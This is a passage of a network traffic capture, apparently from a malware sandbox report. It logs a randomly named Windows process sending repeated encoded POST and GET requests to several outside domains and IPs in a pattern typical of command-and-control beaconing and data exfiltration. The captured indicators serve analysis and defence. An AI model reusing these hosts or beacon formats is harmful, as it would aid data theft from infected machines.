                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.bionanosolutions.info
                                                                  Origin: http://www.bionanosolutions.info
                                                                  Referer: http://www.bionanosolutions.info/i6zb/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Nov 18, 2024 13:13:28.587275982 CET | 711 | IN | HTTP/1.1 405 Not Allowed
                                                                  Server: nginx/1.26.2
                                                                  Date: Mon, 18 Nov 2024 12:13:28 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 559
                                                                  Connection: close
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  8 | 192.168.2.7 | 53156 | 176.117.73.104 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 18, 2024 13:13:30.390229940 CET | 550 | OUT | GET /i6zb/?0PIXBf9=6B2/7Ngl58s2pznOHRe+vJ9NgeSMQEkiwdm42/mNvrNW/DcFgEbztbyoGAni7ddU1GsG6dsX45s7M+CgnpRasEd6qu0hZk1EhvCSzFnjn53BAZCqqKYjVrue1TDSDBq9qg8+DFp/ZHMc&tD_=f00xUVKh HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.bionanosolutions.info
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Nov 18, 2024 13:13:31.532265902 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.26.2
                                                                  Date: Mon, 18 Nov 2024 12:13:31 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 11694
                                                                  Last-Modified: Tue, 15 Oct 2024 10:38:56 GMT
                                                                  Connection: close
                                                                  ETag: "670e4640-2dae"
                                                                  Accept-Ranges: bytes
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#000}button,input,textarea{font-family:Roboto;font-size:inherit;line-height:inherit;color:inherit;background-color:rgba(0,0,0,0)}input,textarea{width:100%}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 53157 | 13.248.169.48 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:13:36.728044033 CET | 792 | OUT | POST /010v/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.tals.xyz
                                                                  Origin: http://www.tals.xyz
                                                                  Referer: http://www.tals.xyz/010v/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Ascii: 0PIXBf9=7B8WlBpfoGjGXr4dGuBX3BLo+efs3OSrDsq+X/RkFzOhevk1AxsD5Vk2f3UW1xOfOnN8Ku7grNJ/BECtIs/Y3p4EzjEPRBxBgkgpEJuv2uK3YYPJNOC7+iseX3NaqxuOolLrHT19ju3Zj+DUUtzhGI+mCryePwgpIq6zeWNkfSxrY1iP5vQ5a4GFiJs8/pWI+dSwiTAlJToo2P1kZw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 53158 | 13.248.169.48 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:13:39.274394989 CET | 812 | OUT | POST /010v/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.tals.xyz
                                                                  Origin: http://www.tals.xyz
                                                                  Referer: http://www.tals.xyz/010v/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Ascii: 0PIXBf9=7B8WlBpfoGjGXLIddNZX/BL3x+fs4uSRDsm+X+UhGBahZNs1B1wD6Vk2XXUT4ROEOnQDKvXgrNd/BFytPfXb254GyTENchxBgkgpEJrA2uS3bpfJPqW4zCsdBnNa8BuKolLJHWJbjr7Zj6HUUczid4+gMLz+LgMmF7vMEWdhWwZUQjjtjNcVEp++mLIKoPL98cWovx0EWkNC7dUgPMoRMAqWr9NgmKr8agZ9owg=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 53159 | 13.248.169.48 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:13:41.823069096 CET | 1825 | OUT | POST /010v/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.tals.xyz
                                                                  Origin: http://www.tals.xyz
                                                                  Referer: http://www.tals.xyz/010v/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 53160 | 13.248.169.48 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:13:44.361424923 CET | 537 | OUT | GET /010v/?0PIXBf9=2DU2m0hj/03yT64ZAvV34ivg7uPA4dfBDsSIbuQmFBnlUt8YBQQ14XEnB00q3iyOSDF3P+nMuqVdWH+dOv2myK47+wAnbzEdrDFKM4GnqLu4eJ36TYO1rG1EAVouommahjHXUR9pmevZ&tD_=f00xUVKh HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.tals.xyz
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Nov 18, 2024 13:13:45.021100998 CET | 416 | IN | HTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Mon, 18 Nov 2024 12:13:44 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 276
                                                                  Connection: close
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?0PIXBf9=2DU2m0hj/03yT64ZAvV34ivg7uPA4dfBDsSIbuQmFBnlUt8YBQQ14XEnB00q3iyOSDF3P+nMuqVdWH+dOv2myK47+wAnbzEdrDFKM4GnqLu4eJ36TYO1rG1EAVouommahjHXUR9pmevZ&tD_=f00xUVKh"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 53161 | 107.167.84.42 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:13:50.572206020 CET | 804 | OUT | POST /g4fs/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.cssa.auction
                                                                  Origin: http://www.cssa.auction
                                                                  Referer: http://www.cssa.auction/g4fs/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Ascii: 0PIXBf9=6l1oZyW0Zc0lvmye0jXNZkF1JFP1kT067SUZLPar6Qwff48+1iXLS/lwnhA94XqjqOg9zy252lNG/+mCiHxeKpGv5CHpggk4X0m4qWHEd0GZ0UN5jPd7tBFUYVlV43HZfRT/8GnW5ErjIizI5FGylejvfYRYvHtlwONthfzm5GUnbP0yZFqKnBqjgd8dYwq1SPL8wZ/S3zeVFMbBAg==
Nov 18, 2024 13:13:51.201149940 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 18 Nov 2024 12:13:51 GMT
                                                                  server: LiteSpeed
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Nov 18, 2024 13:13:51.201195002 CET | 253 | IN | Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 53162 | 107.167.84.42 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:13:53.134028912 CET | 824 | OUT | POST /g4fs/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.cssa.auction
                                                                  Origin: http://www.cssa.auction
                                                                  Referer: http://www.cssa.auction/g4fs/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Ascii: 0PIXBf9=6l1oZyW0Zc0ltGie4h/NRkF2MFP1vz0m7SoZLMW75iUffak+kXjLV/lwtBB1lHqeqOs1z2252kpG/8+C+kpdL5Gt2iHrkgk4X0m4qSvid0uZ1kd5lud4nhFXfVlV83HdfRSQ8Hr85CnjIgrI4UGx+ujlAIQVgyAf6OcfrOHwxlYGa51QDnmm5QSYkfYrPW3AQOPk97LzoE7/Ie6FWWHTQlJjqpO/GSBKAYhThrM=
Nov 18, 2024 13:13:53.754245996 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 18 Nov 2024 12:13:53 GMT
                                                                  server: LiteSpeed
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Nov 18, 2024 13:13:53.754277945 CET | 253 | IN | (continuation of the 404 body)
                                                                  Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 53163 | 107.167.84.42 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:13:55.919303894 CET | 1837 | OUT | POST /g4fs/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.cssa.auction
                                                                  Origin: http://www.cssa.auction
                                                                  Referer: http://www.cssa.auction/g4fs/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Data Ascii: 0PIXBf9= [TRUNCATED]
Nov 18, 2024 13:13:56.424360991 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 18 Nov 2024 12:13:56 GMT
                                                                  server: LiteSpeed
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Nov 18, 2024 13:13:56.424381971 CET | 253 | IN | (continuation of the 404 body)
                                                                  Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 53164 | 107.167.84.42 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:13:58.455259085 CET | 541 | OUT | GET /g4fs/?0PIXBf9=3ndIaHiqeNA3nHGd8AHkXwlYF1OgixBFyjUlI87s5QAdbYlY5Sf7asAsxRx6tHqc14Nk2leX0TZcqtK/n28nLOTw2Vfuiiw8TGap3DrxCRua9Dp2yMpF4VwKHEspiCTWJ2CwkW3F1CDu&tD_=f00xUVKh HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.cssa.auction
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Nov 18, 2024 13:13:59.085617065 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 18 Nov 2024 12:13:58 GMT
                                                                  server: LiteSpeed
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Nov 18, 2024 13:13:59.085654020 CET | 253 | IN | (continuation of the 404 body)
                                                                  Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 53165 | 176.32.38.130 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:14:04.178936005 CET | 822 | OUT | POST /aqil/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.acc888ommodate.xyz
                                                                  Origin: http://www.acc888ommodate.xyz
                                                                  Referer: http://www.acc888ommodate.xyz/aqil/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Ascii: 0PIXBf9=zXYIHHn8ALUg/YVqpNShkN2AX7Nl34H76Qx+2Qn66X1NbT4rb3bBHv+But/YZwFoZNamHhYo7Qej4gHn4kz0mFMSvdMvGsUHLKhHZnTuPmiF2Iznq817tIAIiIZGasxl0ZjQteyYgF2zwGTfgOpNQoNmC1Xsn81EcdpYIByj2R8LuEhAj7sbQQt30pF3lH6rcube+G7rni1pfa3X8w==
Nov 18, 2024 13:14:05.087698936 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:14:04 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 53166 | 176.32.38.130 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:14:07.044697046 CET | 842 | OUT | POST /aqil/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.acc888ommodate.xyz
                                                                  Origin: http://www.acc888ommodate.xyz
                                                                  Referer: http://www.acc888ommodate.xyz/aqil/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Ascii: 0PIXBf9=zXYIHHn8ALUg+5lqqqmhsN2DcbNlsIH/6Qt+2RjT7kRNaxgra2bBO/+B29/XUQFjZNWEHgko7Qaj4ljn4zPznVMQk9MpZcUHLKhHZnHEPm6F24Dnsd14hoALhIZGQMxf0Zi/td2mgH+zwHjfnfpOFYNkMVW+3NNLFNJEPnCtwigamSgi5Zg3OBVMwrhByhneevfGzkPK4VQDSIWTqP1keVEUAfM4GYFBc5TXs9w=
Nov 18, 2024 13:14:07.736435890 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 18 Nov 2024 12:14:07 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.7 | 53167 | 176.32.38.130 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:14:09.585781097 CET | 1855 | OUT | POST /aqil/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.acc888ommodate.xyz
                                                                  Origin: http://www.acc888ommodate.xyz
                                                                  Referer: http://www.acc888ommodate.xyz/aqil/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Ascii: 0PIXBf9=zXYIHHn8ALUg+5lqqqmhsN2DcbNlsIH/6Qt+2RjT7kZNbAArbVDBU/+Bot+wUQF+ZN+AHgoW7SSj+Gbnv3bztVMQrdMoGsVTLKxDZnXEPm6F27bn7c14noAIiIZSaswR0ZaFtebTg3ezznzfltROH4NcB1X73MwLFO9iPjL4wgwa2U80sqYdZndP/pos8jnVReO+4DnF4kUrJqysn6ZiMD0jJ7wSHOUWNrTP3tTKKeB2FdVyc49XHRG4R2qjSAXh0zOlgUiltKMcKxs0mSTUjlF/HV7T1/XS+skFNo5EoxTYlDaxqCLcdpMwpksXPnuWfwMA+qQ/EPJkyfz4qQsQM1mdPKJ97frSJcUja/WTyxi3PT6E/H+LDo012XaAxUkVbkPqpORqWJj3nQLh0yx2NKlAJKqOXHb6njHQ2P8uJqXEH26lFY5szTz/nr0vESBS45L9B0ApjrLNEzEd859SDGoKQAgJF1tBEpCHowUkmnHqlFGRmG6rJRR5YwNLgE9sgg6aJnXYddqc2rbUa1JCVKSJN9tu16fplh6sw30Z9UqaU5Pp7f5pJpvICTMAdQY2Mv7RGjKK1M3WOuDO52Qv7Eybr+8xetj1ZUoA/5RTrJoHRqdTYilnPjra/Oyk5Gvm65Bz2cwzt8IM2I1yxfuBoISL+DkKKJZ/KDiqgD75Kqov8QXQwSKqxQwiQenmmUwZRmsWcGhd9D4F9i7D15H5Gjf8Gq1Hb7GJGi7tRVaoC5mzaEeqI5e0rvQfo2WJxEyCqnO2kkMUSpOFcJGXnXOY13qgZLhHdu1wYDlEYgQrxvzm3tp68rkCxsKBla78fXbxiIWleRn4vfuUUohrxpPCpd9MNBfE4f1p40qE/I8DavkeSizvNTH97wZ03kgjvU9RX/8Io83SMK2SwBB8TH5CIT4ImkgUDcAW1+VHqJpCIF/d0EHu9zvck9KoQ5L2beC46BfWj+7OzVeqg9e/SHouxPTpZJEulALblf3gBzfy7D26 [TRUNCATED]
Nov 18, 2024 13:14:10.474663019 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
